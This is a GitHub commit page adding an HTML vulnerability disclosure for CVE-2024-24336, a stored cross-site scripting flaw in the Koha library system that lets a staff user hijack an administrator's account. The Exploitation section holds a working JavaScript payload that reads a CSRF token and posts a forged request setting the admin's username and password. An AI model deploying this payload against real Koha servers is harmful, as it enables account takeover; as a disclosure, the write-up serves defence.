Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
nitipoom-jar authored Feb 6, 2024
0 parents commit 1e7e7ff
Show file tree
Hide file tree
Showing 9 changed files with 726 additions and 0 deletions.
Binary file added 0.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 2.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 3.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 4.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 5.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added 6.gif
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
178 changes: 178 additions & 0 deletions index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,178 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="styles.css">
<title>CVE-2024-24336</title>
</head>
<body>
<div class="green snipcss-3NIWg">
<div class="container center headings--one-size">
<header class="header">
<div class="header__inner">
<div class="header__logo">
<a href="#">
<div class="logo">
Quantiano
</div>
</a>
</div>
<ul class="menu menu--mobile">
<li>
<ul class="menu__dropdown">
<li>
</li>
<li>
</li>
</ul>
</li>
</ul>
</div>
<nav class="navigation-menu">
<ul class="navigation-menu__inner menu--desktop">
</ul>
</nav>
</header>
<div class="content">
<article class="post">
<h1 class="post-title">
<a href="#">
CVE-2024-24336
</a>
</h1>
<div class="post-meta">
<time class="post-date">
2024-02-06
</time>
<span class="post-author">
Nitipoom Jaroonchaipipat
</span>
</div><br>
<hr>
<div class="post-content">
<div>
<h2 id="#">
Product detail
<a href="#" class="hanchor" arialabel="Anchor">
</a>
</h2>
<ui>Affected product: Koha</ui><br>
<ui>Affected version: 23.05.05.00 (This vulnerability was discovered on November 2023)</ui><br>
<ui>Affected components: '/members/moremember.pl' and ‘/members/members-home.pl’</ui><br><br>
<p class="image-description">
A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version <= 23.05.05 allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components.
</p>
<hr>
<h2 id="proof-of-concept">
Prerequisite
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor">
</a>
</h2>
<p >
Install Koha from official Koha Github repository
<a href="https://github.com/Koha-Community/Koha" target="_blank">
GitHub page
</a><br>
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/0.png"><br>
<p class="image-description">Installed Koha version 23.05.05</p><br>

<hr>

<h2 id="proof-of-concept">
Exploitation
<a href="#proof-of-concept" class="hanchor" arialabel="Anchor">
</a>
</h2>

<p class="image-description">
1. We have 2 roles in the system. lead_admin and patrons_staff
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/1.jpg"><br><br>

<p class="image-description">
2. Patrons_staff can only staff access into this web portal and add, modify, and view patron only
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/2.jpg"><br><br>

<p class="image-description">
3. But patrons_staff with granted won’t be able to edit username for any user except the system admin (same level as default admin by the system)
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/3.jpg"><br><br>

<p class="image-description">
4. Try with a simple xss payload on affected field
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br>

<p class="image-description">
4. Try with a simple xss payload on affected field
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/4.jpg"><br><br>

<p class="image-description">
5. Change from xss popup message to csrf for impact, since cookie had been set with httponly flag, so we couldn’t steal it.
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/5.jpg"><br><br>


<code>
<xmp>
<script>var req = new XMLHttpRequest(); req.open('GET', '/cgi-bin/koha/members/member-password.pl?member=1', true);
req.onreadystatechange = function() { if (req.readyState === 4 && req.status === 200) {
var tokenMatch = req.responseText.match(/<input type="hidden" name="csrf_token" value="([^"]*)"/);
if (tokenMatch) { alert('CSRF Token: ' + tokenMatch[1]); var forgedReq = new XMLHttpRequest();
forgedReq.open('POST', 'http://127.0.0.1:7002/cgi-bin/koha/members/member-password.pl', true);
forgedReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
forgedReq.send('destination=&borrowernumber=1&member=1&newuserid=pwned_leadadmin&newpassword=P@ssw0rd&newpassword2=P@ssw0rd&csrf_token=' +
encodeURIComponent(tokenMatch[1])); } } }; req.send();</script>
</xmp>
</code>

<p class="image-description">
5. The above javascript code will force user send request along with CSRF token, which we will change username and password for default admin which has a number of 1
</p><br><br>

<p class="image-description">
6. Exploitation in gif shows that malicious staff delivered csrf attack to lead admin successful and changed their username
</p>
<img src="https://nitipoom-jar.github.io/CVE-2024-24336/6.gif"><br><br>



</div>
</div>
</article>
</div>
<footer class="footer">
<div class="footer__inner">
<div class="copyright">
<span>
© 2023 Powered by
<a href="https://gohugo.io">
Hugo
</a>
</span>
<span>
::
<a href="https://github.com/panr/hugo-theme-terminal" target="_blank">
Theme
</a>
made by
<a href="https://github.com/panr" target="_blank">
panr
</a>
</span>
</div>
</div>
</footer>
</body>
</html>




Loading

0 comments on commit 1e7e7ff

Please sign in to comment.